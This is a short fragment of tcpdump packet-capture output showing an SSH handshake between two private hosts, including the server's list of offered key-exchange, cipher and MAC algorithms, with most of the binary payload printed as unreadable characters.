..d…D….g..-P..F….
2018-10-14 12:54:51.828554 IP 10.1.2.100.22 > 10.1.3.100.49220: Flags [P.], seq 40:1024, ack 1133, win 2118, length 984
E…..@.@.’.
..d
..d…D….g..-P..F…….. ..*3.3…p.V#.$……ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1…#ssh-rsa,ssh-dss,ecdsa-sha2-nistp256….aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se….aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se….hmac-md5,hmac-sha1,umac-64@openssh.com,hmac-sha2-256,hmac-sha2-256-96,hmac-sha2-512,hmac-sha2-512-96,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96….hmac-md5,hmac-sha1,umac-64@openssh.com,hmac-sha2-256,hmac-sha2-256-96,hmac-sha2-512,hmac-sha2-512-96,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96….none,zlib@openssh.com….none,zlib@openssh.com………………….
2018-10-14 12:54:51.839985 IP 10.1.3.100.49220 > 10.1.2.100.22: Flags [P.], seq 1133:1213, ack 1024, win 252, length 80
E..x#.@…..
..d
..d.D..g..-..”.P….R…..L…..A……E……E0